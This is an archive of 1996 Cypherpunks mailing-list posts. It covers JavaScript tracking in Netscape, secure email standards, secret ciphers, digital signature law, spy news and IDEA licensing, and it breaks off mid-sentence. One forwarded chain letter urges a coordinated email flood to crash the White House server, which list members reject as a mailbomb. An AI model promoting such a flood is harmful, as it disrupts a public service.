> actual algorithms - the question is to determine justice being 
> vague,  and trying to decide to what to do about releasing the algorithms - 
> 
 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 24 Feb 1996 08:18:26 +0800
To: cypherpunks@toad.com
Subject: Re: url
Message-ID: <199602230623.BAA24462@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Frantz wrote:
> 
> At  2:52 PM 2/22/96 -0500, Perry E. Metzger wrote:
> >Mike McNally writes:
> >> At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
> >> some interesting "surveillance" applications of Javascript.[..]
> >When is the patch to let you disable JavaScript inside Netscape going
> >to go out? Its more than time.
> 
> Why Perry, it's called Netscape 1.1N.  :-)

I think the Options menu in Netscape allows you to disable it already.

I only have the 16-bit version running, which doesn't allow it to be 
enabled anyway.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMS1dZioZzwIn1bdtAQEYcwGAvQEDB1b3YqAiiMFaKzDRzprnfLtTnkHp
7rlxQtd4VtToqDNb4aiDwgTKlgs0tP4+
=dUzI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 24 Feb 1996 13:50:30 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: IBM Breakthrough?
Message-ID: <v02140b01ad530c753180@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:03 2/21/96, Mike Duvos wrote:

>Now this has some interesting implications.  One of the problems
>with teleportation devices in Science Fiction stories is that
>they allow for the creation of duplicates.  They reduce an object
>to a pattern by measuring it, and then recreate it at a distance
>by assembling atoms of the same types according to the
>appropriate directions.  There is no theoretical reason why, once
>the pattern has been saved, this process could not be repeated
>multiple times.  This has implications for things like souls and
>self-awareness that many people would rather not think about.

Its been used in an SF Story/Series <g>. It is the Venus Equilateral Series
by George O. Smith. Midway into the Series, they invent a method of doing
Teleportation via destruction of the original item, sending the info to the
receiver, and recreating the object. In the process of a Court Case
involving if the transmission of the signal between the two Teleportation
Devices was a transmission of Energy (which was the province of the other
party in the case) or a transmission of Data (which was VE's job), they had
to invent a Duplicator (in the process allowing the non-destructive readout
of the transmission signal). It gets vary hairy for a story or two until
Civilization gets adjusted to the Duplicator (they have to invent something
that can not be scanned and thus duplicated to act as "Paper" for Money and
Contracts/etc since the bottom fell out of the Economy due to no need for
most Factories and the lack of uncounterfeitible currency).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 24 Feb 1996 01:04:30 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: "and two forms of ID"
In-Reply-To: <v02120d04ad51b2b33a96@[199.0.65.105]>
Message-ID: <312D9940.3746@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
> The natural state of the Net seems to be a kind of semi-anonymity.
> Trying to push it in either direction (complete traceability or
> anonymity) is costly.

  Given that verisign and others will soon begin issuing large numbers of
certificates that do not guarantee the identity of the key holder, it seems
that this tradition will continue even with the wide deployment of X509 certs.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 23 Feb 1996 19:23:32 +0800
To: perry@piermont.com
Subject: Re: url
In-Reply-To: <9602221938.AA17154@alpha>
Message-ID: <312D9E32.5689@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Mike McNally writes:
> > At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
> > some interesting "surveillance" applications of Javascript.
> 
> Okay. We have some netscape people here on this list.
> 
> When is the patch to let you disable JavaScript inside Netscape going
> to go out? Its more than time.

  I agree.  I asked for this option several times over the course of the products
development.  I consider it a grave mistake on my part to not have forced the
issue.  It will be corrected shortly.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 23 Feb 1996 20:13:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Puffer 2.0 Released
In-Reply-To: <199602230155.UAA23263@bb.hks.net>
Message-ID: <199602230948.EAA23344@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kent Briggs writes:
[re: Puffer 2.0]
> New for version 2.0 is the addition of a very fast stream cipher,
> PC1.  PC1 operates with a 40-bit encryption key and produces the
> same stream output as RC4, 

Is PC1 a stream cipher implemented in a "clean room", by reference to an 
abstract specification of the algorithm implied by the Alleged-RC4 source
code, that interoperates with RC4-40 ?

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brad@his.com (Brad Knowles)
Date: Fri, 23 Feb 1996 18:30:02 +0800
To: Raph Levien <resolving-security@imc.org
Subject: Re:
Message-ID: <v01540a15ad5338323efb@brad.his.com>
MIME-Version: 1.0
Content-Type: text/plain


At 4:55 PM 2/22/96, Raph Levien wrote:

>    One of the goals of the IMC is to involve users, not just
> developers. I was ready to "officially" represent the "cypherpunk user
> community," but fortunately, I didn't need to. In fact, the strongest
> advocacy of strong crypto came from an employee of a "large service
> provider in America."

    I consider myself a neophyte CypherPunk, in that I just
joined the DC CypherPunk mailing list.  If you check a
particular issue of _Communications of the ACM_ in the "ACM
Forum" section, you'll see that I've been kicking around this
kind of stuff for a little while.  For anyone who is interested,
I'll post or privately email the information on which issue it
was, as soon as I can remember which issue it was.

>    There were five contenders on the field going into the day, and two
> and a half at the end. MOSS was one of the casualties. A lot of us
> were sorry to see it go, but eliminating candidates has got to happen
> if we're going to have interoperation.

    I would have to say that MOSS does have the advantage of
being very well MIME-integrated, and therefore can serve as a
good framework on how to use something that is not necessarily
PEM-based.  I'm seriously hoping that whatever we finally come
up with, it won't look too very different from RFC 1848, except
where specific algorithms are discussed or perhaps additional
features.

>    There was a lot of energy around S/MIME. People are implementing
> it. Internally, it's pretty kludgely, but it does provide pretty good
> cryptographic services. (as an aside, my favorite kludge anecdote is
> the fact that X.509 certificates use an IA5 character set rather than
> ASCII, so that the @ in email addresses has to be represented as (a)
> instead).

    Oh, yeah.  We (the community interested in secure Internet
email) need to decide if we're willing to have an internal and
an external representation differ in this manner, since we
obviously can't show IA5 strings to the user or expect them to
type in IA5 strings.  My personal opinion is that the IA5
strings need to be dumped in favour of a proper Internet email
address format (which I'm sure is specified by one of the
bazillion email-related RFCs, I just don't know which one to
reference).

>    The biggest problem with S/MIME is that the signed and encrypted
> format reveals who made the signatures. Obviously, this has severe
> consequences for anonymous mail. Believe it or not, a lot of people
> care.

    IMO, this has to be fixed as well.  The good thing is that
the folks who have an investment in S/MIME seem to be willing to
make changes to the specification to suit the desires of the
larger secure Internet email connunity at large.  I hope that
companies like VeriSign (that help other comapnies to implement
this kind of technology) also agree to follow suit.

>    One strength of PGP has traditionally been its unity. PGP means one
> message format (the PGP one), one suite of crypto algorithms (the PGP
> one), one key format (the PGP one), one application (PGP itself). Most
> of the other proposals are modular in some way, especially with
> respect to algorithms. PGP is moving in that direction.

    IMO, unity in this case is both a benefit and a deficit.
Because it has not historically been separable, it's either all
or none of PGP, and that's not an implementory style that's
likely to win friends or marketshare.  To that degree, I think
PGP has probably been less successful than it could have been.
To the degree that this is changing is one indicator of its
potential to continue to be a player.

>    Earlier, I mentioned that two and a half protocols survived the
> day. The remaining one is MSP. It's actually not a bad protocol. It
> has two features that none of the others have: the ability to label
> classified messages, and a cryptographically strong signed receipt.
> Both of these functions are highly important for government users. It
> looks like government suppliers are going to go ahead and implement
> it, and the government is going to use it.

    Although these benefits are present in the current MSP, I
don't see anything inherent in MSP that makes it necessarily
superior in these areas.  If you were doing normal MIME-type
receipts (whatever that means, since I think there are three
different drafts under way currently), and you simply added the
ability to cryptographically sign a timestamp in the "proper"
MIME receipt type, then MSP would lose this advantage.

    I think labeling could potentially be done by follow-on
versions of other packages as well, since I think we all agree
that generic labeling which can be used both for standard
gov't-style classification levels and compartments, as well as
for business-style sensitivity labeling.  In fact, I'd almost be
inclined to say that it would likely be as easy (or easier) to
create a new general-purpose labeling system for use with any of
the competitors than it would be to modify MSP to support
business-style labels in addition to the gov't-style labels I'm
sure it has today (maybe it already has labels, but I don't
think that this is that tough of a problem to solve in any
event).

>    My feeling is that the main differences are cultural. MSP still has
> a very ASN.1, OSI, governmental flavor. Its proponents are making the
> effort to be responsive to users, but I think there's still a bit of
> skepticism about that, perhaps misguided, perhaps not.

    Yes, ASN.1.  Ugh.  Dave, have you been able to dig up that
penultimate discourse upon ANS.1 from your brother?


    On the whole, I haven't read anything of MSP yet, so perhaps
I'm totally off-base.  Maybe I'm misguided on this, but when it
comes to "new" protocols or standards that just suddenly drop
onto my radar screen, I sometimes wonder why I haven't heard of
them before and what someone is trying to hide.

>    My advice to US developers: don't even try to export a 40-bit
> version of your product. Just leave crypto out of the export version.
> Your product will have better performance and many fewer configuration
> problems. Include 40-bit in the US product if you have to, but don't
> allow it to be used silently. For example, put up a little dialog that
> says, "are you _sure_ you want to use 40-bit encryption? It's not
> secure, you know."

    This is where I say that what we need to do is neither cave
in to the limitation imposed by the gov't nor do we accept that
we have to rip out encryption from our products to be shipped
overseas or used in the U.S. on the behalf of overseas
customers.  We need to (on a daily basis) wipe the gov't nose in
this mess that they've created, until such time as they learn
that it stinks and that they shouldn't do that indoors anymore.

    ITAR be damned.


>    If care about offering crypto in the non-US market, form a
> partnership with overseas developers to add the crypto.
>
>    Non-US developers, now is a fabulous opportunity. Get those
> implementations underway, the sooner the better.

    And own the crown jewels to every single company in the U.S.
all that much faster.  It's not like the NSA is help to protect
them from espionage that originates from competitors or from
what used to be the political espionage organizations that are
now fighting to keep their jobs.  It's not like companies will
have a single moments interest in having to deal with two
different standards for their U.S. customers and overseas
customers, or worse, their U.S. subsidiaries and their overseas
subsidiaries.


    Everybody should buy their encryption technology from a
country where this kind of thing isn't under export control, and
then ship (or operate) from that country.  When all the
companies have moved overseas somewhere (or at least moved the
official bits that they have to move in order to make this
happen), maybe the U.S. gov't will wake up.  But of course, by
then it will be too late.  And the NSA (and other governmental
entities) will have succeeded in doing "Very Grave Harm to
National Security Interests" because there won't be much of a
Nation left behind when all the companies (and therefore
workers) are overseas.



    Sorry, this has been a *major* sore point with me for years.

>    Most serious email vendors plan to "implement everything that's
> real." That means S/MIME for sure, PGP/MIME assuming they can get
> their hands on a decent implementation, and MSP if they sell a lot of
> stuff to the government.

    I'm hoping that we'll be able to significantly reduce the
playing field of "what's real".

>                                              Over the next few months,
> we will see some very high profile, mass market implementations.

    You may see them from others, but I don't think you're
likely to see them from us anytime soon.  See my comments above
about ITAR.  We're a world-wide company (and trying to become
even moreso) with world-wide customers.  Hell, we could even get
completely cut off from certain countries because they deem that
we're providing access to "illegal" or "unapproved" encryption
technologies.

>    At the end of the meeting, Dave asked the room for consensus on
> several points. First, there was strong consensus that the encryption
> protocols converge on multipart/security for their signed message
> format.

    You mean "multipart/signed", right?

    There was also strong support for changing the
"octet-stream" definition of "multipart/encrypted" to something
more meaningful (hopefully simply state that it's one of the
standard MIME types, and can presumably be safely converted to
and from things like base64 or quoted-printable, or that its
canonical form is one of the seven-bit safe formats).  With that
change, there was strong support that I heard voiced for
supporting "multipart/encrypted" as well.

>    I'd say that's quite a remarkable achievement for a such a
> difficult area.

    Agreed.  I think Dave Crocker deserves a lot of credit for
how well he managed to shepard us "cats" and that he didn't let
things get far enough off-track that we turned into "hostile
cats".

        -Brad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Fri, 23 Feb 1996 22:19:16 +0800
To: cypherpunks@toad.com
Subject: Re: A Challenge (perhaps!)
Message-ID: <9602231402.AA09643@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:

> > >I know it doesn't exercise key technology and relies on the secrecy of the
> > >algorithm (which from my very limited knowledge on cryptography I think
makes
> > >it almost doomed from the start (?))... 

>The way I like to think of such a scheme is to consider the secret
>algorithm itself to be the key, ....

This seems to me to be a perfectly valid point of view.  

One absolute requirement of any decent cryptosystem is 
that weak keys be vanishingly rare.  This can be done if 
almost all keys are strong or if a simple procedure can be 
found to identify and eliminate weak keys.  

Another absolute requirement is the ability to change keys.

It is also useful to be able to negotiate keys using 
procedures like Diffie-Helman key exchange.

Your suggested viewpoint shows very clearly why systems that 
depend on secret algorithm are often quite bad.

If you have the resources to adequately evaluate an algorithm 
yourself, (like the NSA does) you might gain some security by 
keeping your algorithm secret.  Even then, you would want 
a system that allowed you to change effectively.  My personal 
guess is that an algorithm that can generate novel, secure 
ciphers is beyond the power of any human agency, and will be 
for a long time.  

Incidentally, since the "original poster's friend" knows the algorithm, 
and every person that ever uses this cipher will have a copy of it, 
why should I trust this cipher?  None of the other users know me, so 
they should never let me hack^h^hve a copy.  So, even if they have found 
a secure system, (which experience says is very doubtful) I couldn't 
possibly have any interest in it.











Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 24 Feb 1996 14:08:03 +0800
To: cypherpunks@toad.com
Subject: Look, a chain letter :-)
Message-ID: <uR6qJD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I received a curious mimetic e-mail. The cypherpunks relevance is: will we
or will we not bring down the White House server? :-)

---------- Forwarded message ----------

To whoever may read this,

This is not a typical chain letter, in that by passing it on to as many
people as you can, you are taking part in what may yet become the
world's biggest practical joke. The U.S. Government has recently passed
an act which enforces censorship on the internet. A group of internet
users has now come together to kick back at this oppression, and have a
bit of fun at the same time.

The aim of this exercise is to re-establish the United States as "The
Land of the Free", not a fascist state where freedom of speech and
thought are curtailed. Communist Russia fell as a result of such limits
being placed upon the minds of the general populus.

On receiving this letter, please pass it on to as many friends or
E-mail lists as you can. We predict that if everybody copies the letter
to 5 other addresses, by February 29th 1996, this letter should have
reached in excess of 2 million people. That's when the fun
begins........

On February 29th, please send the message:

Dear Mr. President,

Do you remember this:

And afterwards enclose the pre-typed copy of the Bill of Rights. By
sending the letter on the date above, you will contribute to either one
huge petition for freedom, or else lead to a crash of the White House
server.

Send all letters to:

President@Whitehouse.gov

Remember that solidarity is the key to success



                              THE BILL OF RIGHTS





  Amendment I



   Congress shall make no law respecting an establishment of religion,
   or prohibiting the free exercise thereof; or abridging the freedom
   of speech, or of the press; or the right of the people peaceably to
   assemble, and to petition the government for a redress of
   grievances.



  Amendment II



   A well regulated militia, being necessary to the security of a free
   state, the right of the people to keep and bear arms, shall not be
   infringed.



  Amendment III



   No soldier shall, in time of peace be quartered in any house,
   without the consent of the owner, nor in time of war, but in a
   manner to be prescribed by law.



  Amendment IV



   The right of the people to be secure in their persons, houses,
   papers, and effects, against unreasonable searches and seizures,
   shall not be violated, and no warrants shall issue, but upon
   probable cause, supported by oath or affirmation, and particularly
   describing the place to be searched, and the persons or things to be
   seized.



  Amendment V



   No person shall be held to answer for a capital, or otherwise
   infamous crime, unless on a presentment or indictment of a grand
   jury, except in cases arising in the land or naval forces, or in the
   militia, when in actual service in time of war or public danger; nor
   shall any person be subject for the same offense to be twice put in
   jeopardy of life or limb; nor shall be compelled in any criminal
   case to be a witness against himself, nor be deprived of life,
   liberty, or property, without due process of law; nor shall private
   property be taken for public use, without just compensation.



  Amendment VI



   In all criminal prosecutions, the accused shall enjoy the right to a
   speedy and public trial, by an impartial jury of the state and
   district wherein the crime shall have been committed, which district
   shall have been previously ascertained by law, and to be informed of
   the nature and cause of the accusation; to be confronted with the
   witnesses against him; to have compulsory process for obtaining
   witnesses in his favor, and to have the assistance of counsel for
   his defense.



  Amendment VII



   In suits at common law, where the value in controversy shall exceed
   twenty dollars, the right of trial by jury shall be preserved, and
   no fact tried by a jury, shall be otherwise reexamined in any court
   of the United States, than according to the rules of the common law.



  Amendment VIII



   Excessive bail shall not be required, nor excessive fines imposed,
   nor cruel and unusual punishments inflicted.



  Amendment IX



   The enumeration in the Constitution, of certain rights, shall not be
   construed to deny or disparage others retained by the people.



  Amendment X



   The powers not delegated to the United States by the Constitution,
   nor prohibited by it to the states, are reserved to the states
   respectively, or to the people.




---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 23 Feb 1996 22:34:52 +0800
To: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Subject: Internet Protest!
In-Reply-To: <199602230422.UAA12375@infinity.c2.org>
Message-ID: <9602231413.AA17645@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Mark Allyn writes:
 > Please pass along this to anyone you know who has an email account! We
 > need to have everyone take part in this protest!

Sophomoric idiocy.  I can think of few actions that would marginalize
the on-line community more than for a bunch of geeks to mailbomb the
"white house".  Some poor sysadmin will be stuck dealing with his
filled-up mailbox, and that's it.  Is anybody so seriously delusional
that they imagine poor Bill Clinton having to work his way through all
the mail with elm?

Sheesh.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sat, 24 Feb 1996 01:28:03 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602231635.IAA22733@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 22 Feb 1996 08:56:13
>To: cypherpunks@Toad.com
>From: geeman@best.com
>Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
>
>
> IDG: Get real.  Publish the stuff like the rest of the world does.  The
only ones who don't are just not players in the game.  If you want to try to
snow consumer-types then go ahead.  But if you want validation from the
crypto community you'll have to just publish it. 
>
>And if you don't, and just continue the marketing fluff, then people from
this list, and others in the community, will be all over you and the
publications (lists, press, etc) with the theoretical and inferred
weaknesses of your system. 
>
>I would say the onus is on you to put up or shut up and don't try to
orchestrate or control the parameters of the disclosure.  It's really in
your own interests, I would think.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yee, Peter" <yee@spyrus.com>
Date: Sat, 24 Feb 1996 15:07:47 +0800
To: brad@his.com (Brad Knowles)
Subject: Re: [No subject]
Message-ID: <9601238250.AA825095039@spysouth.spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain



>>    Earlier, I mentioned that two and a half protocols survived the 
>> day. The remaining one is MSP. It's actually not a bad protocol. It 
>> has two features that none of the others have: the ability to label 
>> classified messages, and a cryptographically strong signed receipt.
>> Both of these functions are highly important for government users. It 
>> looks like government suppliers are going to go ahead and implement
>> it, and the government is going to use it.

>Although these benefits are present in the current MSP, I
>don't see anything inherent in MSP that makes it necessarily superior in these 
>areas.  If you were doing normal MIME-type receipts (whatever that means, since
>I think there are three different drafts under way currently), and you simply 
>added the ability to cryptographically sign a timestamp in the "proper" MIME 
>receipt type, then MSP would lose this advantage.

FIF.  I guess this could be said about any of the protocols.  With enough 
changes they all have the same feature set. :-)  MSP just has it now and it 
works.

>I think labeling could potentially be done by follow-on
>versions of other packages as well, since I think we all agree that generic 
>labeling which can be used both for standard gov't-style classification levels 
>and compartments, as well as for business-style sensitivity labeling.  In fact,
>I'd almost be inclined to say that it would likely be as easy (or easier) to 
>create a new general-purpose labeling system for use with any of the 
>competitors than it would be to modify MSP to support business-style labels in 
>addition to the gov't-style labels I'm sure it has today (maybe it already has 
>labels, but I don't think that this is that tough of a problem to solve in any 
>event).

Well, read MSP first before assuming.  And of course, see above comment.

                                                                -Peter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 24 Feb 1996 05:48:51 +0800
To: cypherpunks@toad.com
Subject: Re: Look, a chain letter :-)
Message-ID: <199602231822.KAA01569@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:55 AM 2/23/96 -0500, Dr. Dimitri Vulis wrote:
>I received a curious mimetic e-mail. The cypherpunks relevance is: will we
>or will we not bring down the White House server? :-)

This struck me as a mailbomb attack, which I would rather not particpate
in.  However, I have a letter on the CDA I want to send to the president. 
It might turn out that it is ready to send on Feb 29.  :-)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 24 Feb 1996 01:27:50 +0800
To: cypherpunks@toad.com
Subject: NSA agent arrested
Message-ID: <Pine.A32.3.91.960223112622.68722A-100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I just heard a very short blurb on CBC radio about a KGB mole within the NSA
from the 60's (?) getting arrested by the FBI. Pretty much no details 
were given. Any info?

(Apologies if someone else has posted this today, I'm following the list 
from the hks archives, which I assume have a minor delay.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 24 Feb 1996 08:25:54 +0800
To: cypherpunks@toad.com
Subject: Diffie-Hellman parameters
Message-ID: <199602231942.LAA16629@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




Perhaps this is the wrong list to ask this question on, but
does anyone have any pointers to where I could find good Diffie-Hellman
parameters?  Or source code that will generate some?

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 24 Feb 1996 03:34:29 +0800
To: cypherpunks@toad.com
Subject: CBC: NSA employee arrested
Message-ID: <Pine.A32.3.91.960223122719.74464A-100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Here's the actual blurb (from <http://www.radio.cbc.ca> ) from the 11 am EST
report (and it wasn't rebroadcast or elaborated on at 12).
   
   A former employee of the american national security agency has been
   arrested on charges that he spied for the kgb in the 1960's. The f-b-i
   arrested the man at his home in pennsylvania this morning. Police say
   the arrest is important but dosn't compare in magintude to the aldrich
   ames case..,,the biggest spy scandal in u-s history. 
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 24 Feb 1996 05:02:53 +0800
To: cypherpunks@toad.com
Subject: REM_ote
Message-ID: <199602231751.MAA16891@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-23-96. WSJ:

   "H-P Acquires Most of Internet Security Firm."

      SecureWare technology is used by the Pentagon to
      safeguard transmission of military secrets. The firm's
      team of about 40 programmers is "a substantial fraction 
      of the hired guns available in the on-line security 
      world" who snake oil an extra virgin security that not 
      even hackers can cross. Hackers would question that; 
      they have a remarkable history of eventually figuring 
      out ways to get past advances in faked chastity.

   "Netscape Will Issue Fix for Flaw Found In Browser System."

      The company confirmed that Princeton researchers found
      a security flaw in the "applets" created with Java, but
      said the flaw was minor and that the company will issue
      a software fix for it next week. Jeff Treuhaft said
      exploiting the flaw would require extremely skilled
      hacking. Marianne Mueller, Java security engineer, also
      said the chances of such hacking occurring are "remote."

   REM_ote










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 24 Feb 1996 07:38:36 +0800
To: s1018954@aix2.uottawa.ca
Subject: Re: NSA agent arrested
In-Reply-To: <Pine.A32.3.91.960223112622.68722A-100000@aix2.uottawa.ca>
Message-ID: <199602231851.MAA07830@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:

>I just heard a very short blurb on CBC radio about a KGB mole within the NSA
>from the 60's (?) getting arrested by the FBI. Pretty much no details 
>were given. Any info?

Yeah, I got his name but was not sure of the spelling. Robert Steven
something. Lives in Millersville, PA. I think he is retired. Looks like a
victim of the cozying relationship between the FBI and the KGB-whatever
they call themselves nowadays.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 24 Feb 1996 04:58:20 +0800
To: cypherpunks@toad.com
Subject: DEP_tot
Message-ID: <199602231752.MAA17029@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-23-96. TWP:

   "CIA Defends Rule on Use Of Reporters."

      In the face of growing criticism from American news
      organizations, CIA Director John M. Deutch yesterday
      insisted he would not rule out employing American
      journalists in secret intelligence operations where
      American lives are at stake or a weapon of mass
      destruction might be used.

   2-23-96. NYT:

   "C.I.A. Chief Defends Secrecy, in Spending and Spying, to
   Senate."

      The DCI said today that the secret budget for spying
      might be made public, and he defended a longstanding
      policy allowing clandestine officers to pose as
      reporters or to use journalists as informers. Posing as
      a reporter is an ideal cover for a spy, since both jobs
      require traveling to out-of-the-way places and prying
      out secrets.

   DEP_tot



   For Deep Throat Scowcroft parallels to the CoFR report on
   the future of intelligence see the ISD recommendations to 
   the Presidential Commission on intelligence:

   
http://sfswww.georgetown.edu/sfs/programs/isd/files/intell.htm












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "C. Bradford Biddle" <biddle@pwa.acusd.edu>
Date: Sat, 24 Feb 1996 09:47:16 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Digital Signature Legislation (fwd)
In-Reply-To: <199602222030.MAA04720@netcom7.netcom.com>
Message-ID: <Pine.3.89.9602231154.A13908-0100000@pwa.acusd.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Feb 1996, Bill Frantz wrote:

> At  20:54 AM 2/20/96 -0500, C. Bradford Biddle <biddle@pwa.acusd.edu> wrote:
> >---------- Forwarded message ----------
> >
> >DIGITAL SIGNATURE LEGISLATION: SOME REASONS FOR CONCERN

[...]

> >LIABILITY

[...]

> The question I have is, does "reasonable care" include keeping your machine
> "virus free"?  

A very good question, and one not answered by the Utah Act. The answer to
the question of what constitutes reasonable care for holders of private
keys will have to be addressed through the long, expensive, and inelegant
process of common law evolution: court case after court case after court
case slowly providing an answer. In contrast, the duties of certification
authorities are explicitly described in the Act. 

> >There is a second troubling policy choice relating to liability. The Utah
> >Act limits the potential liability of one actor in the infrastructure --
> >the certification authority -- to a fixed amount (termed a "suitable
> >guarantee" and determined by a complex formula or by administrative rule).
> 
> The historic precedent is the liability limit on nuclear power plants.

An interesting point, which can be spun several ways. The nuclear 
industry has been able to externalize the immense costs of waste storage, 
etc. Would the same investments have been made in nuclear energy if the 
nuclear industry was forced to internalize all of the costs it generates, 
including the costs of potential accidents? Probably not. I suspect that 
you could find people who would argue that the liability limits have had 
very good consequences (i.e., promoting investment in an ultimately 
beneficial technology) and others who would say that the current state of 
the nuclear industry points out the harm in allowing an industry to 
externalize costs.

> For both these problems, a relatively low liability limit would force
> people to use other techniques (e.g. old style signed contracts) for large
> transactions.  While we are working the bugs out of a new technology, with
> new standards of "reasonable care", everyone might win if the risks are
> limited.

Agreed. Letting market forces sort out the most appropriate risk 
allocations may be the best solution. This isn't really what the Utah Act 
does, however.

> Regards - Bill
> 
> 
> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA


Thank you for your thoughtful comments.

Brad

Brad Biddle, Legal Intern <biddle@acusd.edu>
Privacy Rights Clearinghouse, Ctr for Public Interest Law
http://pwa.acusd.edu/~prc


For the record: Someone else who responded to my post on the Cypherpunks 
list referred to me as "Dr. Biddle." I think they were misled by Phil 
Agre's characterization of me as an "academic" in his introduction to my 
article. (Or perhaps just dazzled by the force of my arguments). I am, in 
fact, a law *student*, not a law professor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sat, 24 Feb 1996 06:16:54 +0800
To: cypherpunks@toad.com
Subject: Ascom Tech License for IDEA
Message-ID: <Pine.SCO.3.91.960223131904.25492A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


The following is a statement from David Barnhart, PGP Product Manager 
from ViaCrypt, regarding Ascom Tech's position on licensing IDEA:

"In the US, ViaCrypt pays the royalties to Ascom for every copy of 
